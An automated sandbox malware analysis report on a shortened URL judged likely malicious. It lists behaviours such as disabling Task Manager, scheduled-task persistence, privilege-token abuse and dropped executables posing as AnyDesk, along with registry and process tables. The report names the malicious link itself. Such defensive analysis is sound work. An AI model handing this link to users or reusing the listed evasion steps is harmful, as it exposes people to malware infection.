Malware Analysis Report

2024-12-07 14:56

Sample ID 241004-dsgc4a1gjm
Target http://rb.gy/g44izl
Tags
discovery evasion execution exploit
score
8/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
8/10

Threat Level: Likely malicious

The file http://rb.gy/g44izl was found to be: Likely malicious.

Malicious Activity Summary

discovery evasion execution exploit

Disables Task Manager via registry modification

Possible privilege escalation attempt

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Modifies file permissions

Executes dropped EXE

Checks computer location settings

Loads dropped DLL

Checks installed software on the system

Drops file in System32 directory

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Modifies registry key

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of SendNotifyMessage

Scheduled Task/Job: Scheduled Task

Delays execution with timeout.exe

Uses Task Scheduler COM API

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Suspicious use of WriteProcessMemory

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Modifies data under HKEY_USERS

Views/modifies file attributes

Modifies registry class

NTFS ADS

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of SetWindowsHookEx

Suspicious behavior: AddClipboardFormatListener

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-10-04 03:16

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-10-04 03:16

Reported

2024-10-04 03:24

Platform

win10v2004-20240802-en

Max time kernel

475s

Max time network

475s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://rb.gy/g44izl

Signatures

Disables Task Manager via registry modification

evasion

Downloads MZ/PE file

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\Downloads\Goonscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\doorbell-upd6.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Roaming\locked.exe N/A
Key value queried \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000\Control Panel\International\Geo\Nation C:\ProgramData\stn.exe N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\ProgramData\Anydesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A

Checks installed software on the system

discovery

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1280.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_sr.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_custom_stream.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_768.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_exif.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_1920.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\user.conf C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_32.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_96.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_256.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_wide_alternate.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_16.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Roaming\AnyDesk\ad.trace C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_idx.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_48.db C:\ProgramData\Anydesk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Explorer\iconcache_2560.db C:\ProgramData\Anydesk.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Anydesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\Anydesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\ProgramData\AnyDesk.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\ProgramData\Anydesk.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\ProgramData\Anydesk.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections C:\ProgramData\Anydesk.exe N/A

Modifies registry class

Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" --play \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\ = "URL:AnyDesk Protocol" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon\ = "AnyDesk.exe,0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Moniker = "cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon\ = "\"C:\\ProgramData\\AnyDesk.exe\",0" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\URL Protocol \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings C:\Windows\system32\wscript.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\DisplayName = "Chrome Sandbox" C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\shell\open\command \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\shell\open\command\ = "\"C:\\ProgramData\\AnyDesk.exe\" \"%1\"" \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\cr.sb.cdmf5200eafd3ad904629cbb0f87a78a3c7211081fe\Children C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\Deployment\Package\*\S-1-5-21-2412658365-3084825385-3340777666-1000\{B27B3CB8-01DD-4B4E-B437-D87785F51D84} C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\.anydesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Classes\AnyDesk\DefaultIcon \??\c:\users\Admin\downloads\AnyDesk.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2412658365-3084825385-3340777666-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Mappings\S-1-15-2-993994543-2095643028-780254397-2751782349-1045596949-3142982554-3368930949 C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Modifies registry key

Description Indicator Process Target
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A
N/A N/A C:\Windows\system32\reg.exe N/A

NTFS ADS

Description Indicator Process Target
File opened for modification C:\Users\Admin\Downloads\Unconfirmed 199374.crdownload:SmartScreen C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: AddClipboardFormatListener

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A \??\c:\users\Admin\downloads\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\ProgramData\AnyDesk.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious behavior: GetForegroundWindowSpam

Description Indicator Process Target
N/A N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Windows\system32\takeown.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: 33 N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\system32\AUDIODG.EXE N/A
Token: 33 N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Program Files\VideoLAN\VLC\vlc.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\icacls.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
